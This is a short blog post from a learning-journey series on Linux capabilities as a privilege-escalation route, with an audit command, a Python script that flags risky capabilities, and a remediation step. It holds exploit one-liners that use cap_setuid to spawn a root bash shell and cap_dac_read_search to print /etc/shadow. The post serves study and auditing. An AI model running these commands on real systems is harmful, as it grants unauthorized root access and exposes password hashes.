DEV Community

Devon Argent

Day 19: Linux Capabilities — The "Silent" Path to Root 🕵️‍♂️

πŸ” The Auditor's Command: getcap

To find these hidden permissions, I used:

getcap -r / 2>/dev/null

🔓 The Dangerous Duo: Exploiting Capabilities

1. cap_setuid (The King of Capabilities)

If a binary like Python has this capability, it can change its User ID (UID) to 0 (Root).
The Exploit:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

2. cap_dac_read_search (The Data Thief)

This capability lets a program bypass Discretionary Access Control (DAC) read checks: it skips file read permission checks and directory read and search checks, so it can read any file on the system, regardless of its owner.
The Exploit:
python3 -c 'print(open("/etc/shadow").read())'
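
To turn the `getcap -r /` listing into an audit result, the sketch below parses its output and flags the two capabilities covered above. It is an added example, not code from the original post: the names `parse_getcap`, `audit` and `GENERAL_PURPOSE` and the sample lines are constructed for illustration. It accepts both the older (`path = cap_x+ep`) and newer (`path cap_x=ep`) libcap output formats and ignores capabilities that are only in the inheritable set.

```python
import re

# The two capabilities covered in this post and what each grants.
RISKY = {
    "cap_setuid": "can set its UID to 0",
    "cap_dac_read_search": "bypasses file read permission checks",
}
# Assumed, non-exhaustive list of general-purpose programs that should never carry them.
GENERAL_PURPOSE = ("python", "perl", "ruby", "node", "php", "gdb", "vim", "tar")

CLAUSE = r"[a-z0-9_,]*[=+-][eip]*"
CLAUSE_RE = re.compile(r"([a-z0-9_,]*)([=+-])([eip]*)$")
# Older libcap prints "path = cap_x+ep", newer prints "path cap_x=ep"; paths may hold spaces.
LINE_RE = re.compile(rf"^(?P<path>/.*?)\s+(?P<caps>{CLAUSE}(?:\s+{CLAUSE})*)$")

def parse_getcap(text):
    """Yield (path, capabilities in the effective or permitted set); "all" means every one."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # blank lines and anything that is not a capability listing
        granted = set()
        for clause in m.group("caps").split():
            names, op, flags = CLAUSE_RE.match(clause).groups()
            if op != "-" and set(flags) & {"e", "p"}:
                granted.update(n for n in (names or "all").split(",") if n)
        yield m.group("path"), granted

def audit(text):
    """Return sorted findings as (severity, path, capability, reason)."""
    findings = []
    for path, granted in parse_getcap(text):
        for cap, reason in RISKY.items():
            if cap in granted or "all" in granted:
                name = path.rsplit("/", 1)[-1]
                sev = "HIGH" if name.startswith(GENERAL_PURPOSE) else "REVIEW"
                findings.append((sev, path, cap, reason))
    return sorted(findings)

# Constructed sample of `getcap -r /` output mixing both formats (not from a real host).
SAMPLE = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 = cap_setuid+ep
/opt/backup tools/reader cap_dac_read_search=ep
/usr/bin/perl cap_setuid+i
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(*finding, sep="  ")
```

A capability that has no business being on a binary can be removed with `setcap -r <path>`.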

Follow my journey: #1HourADayJourney
